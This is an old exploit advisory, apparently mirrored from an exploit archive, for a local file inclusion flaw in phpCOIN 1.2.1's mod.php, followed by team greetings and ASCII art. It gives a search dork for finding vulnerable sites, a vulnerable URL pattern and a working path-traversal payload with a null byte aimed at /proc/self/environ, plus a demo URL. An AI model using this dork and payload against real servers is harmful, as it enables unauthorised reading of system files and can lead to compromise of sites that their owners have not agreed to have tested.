扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 |
# Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability # Author:_mlk_ # Software Link: null # Version: phpCOIN 1.2.1 # Tested on: Linux*,*BSD and *windows # Code : on paper phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability ############################################################################################################# # # #[+] Discovered by : _mlk_# # # #[+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs # # # #[+] Sites :http://code.google.com/p/bugsec/# # http://botecounix.com.br/blog/# # http://c0d3rs.wordpress.com/# # # ############################################################################################################# # # # [-] Information # # # #[+] Script :phpCOIN 1.2.1# # # #[+] Language :PHP# # # #[+] Vendor :http://www.phpcoin.com/# # # #[+] Dork/String :"Powered By phpCOIN v1.2.1" / "mod.php?mod=faq" # # # #[+] Date :02/03/10 (Brazil)# # # ############################################################################################################# # # # [*] Example : # # # #http://localhost/[PATH]/mod.php?mod=[LFI]%00# #http://localhost/mod.php?mod=[LFI]%00# # # # # #---------------------------------------------------------------------------------------# # # # # # [*] Exploit : # # # #/../../../../../../proc/self/environ%00 # #/proc/self/environ%00# # # # # #---------------------------------------------------------------------------------------# # # # # # [*] Demo :# # # #http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00# # # # # ############################################################################################################# # # #_\|/_ Greetz : # # # #Cooler_ , m0nad , i4k , F10N4 , dr4k3 , m1cr0n , l4rt , sh0rtkiller , hox , d4m4g3 , M0nt3r ,# #and all my friends emos ... xD # # # ############################################################################################################# ,,,, ((((( ))))) (((((( )))))) (((((( Overflow)))))) (((((,e@@@@@@@@@@e,))))) (((@@@@@@@@@@@@@@@@))) BUGSEC TEAM \@@/,:::,\/,:::,\@@/ /@@@|:::::||:::::|@@@\ / @@@\':::'/\':::'/@@@ \ //@@@@@@@//\\@@@@@@@\\ (/'@@@@@@@@@@@@@@'\) \( /\ )/ \ () / ('-.)' [Ruby](<code>'.) ' \/('-.)' (</code>'.)[ASM] '('-.)' . '.('-.)' (<code>'.) '('-.)' (</code>'.) ' ' .( '.) '[Flex+bison]('-.)' (<code>'.) '('-.)' (</code>'.) ' _ ('-.)' (<code>'.) '('-.)' (</code>'.) '('-.)'[Emacs] (<code>'.) (</code>'.) '' |0|=======- -(. ')<code>[VIM]( .-</code>)(<code>'.) ',(-')'('-.)' (</code>'.) (<code>'.) ' .--</code>+'--..(' -,).(') .('-.)' (<code>'.) '('-.)' (</code>'.)(<code>'.) [Python]' ' |</code>-----'| (' .) - ('. )[Perl]('-.)' (<code>'.) '('-.)' (</code>'.) '(<code>'.) ' | |. ('[PHP] </code>.)('-.)' (<code>'.)[REGEX] '('-.)' (</code>'.) ' |===| <code> .</code>('-.)'[C/C++] (<code>'.) ('-.)' (</code>'.) '' |BugSec |('-.)' (<code>'.) '('-.)[AWK]' (</code>'.) ' |---| | |Art by Cooler_ |GDB| | | `-.___.-' |
体验盒子
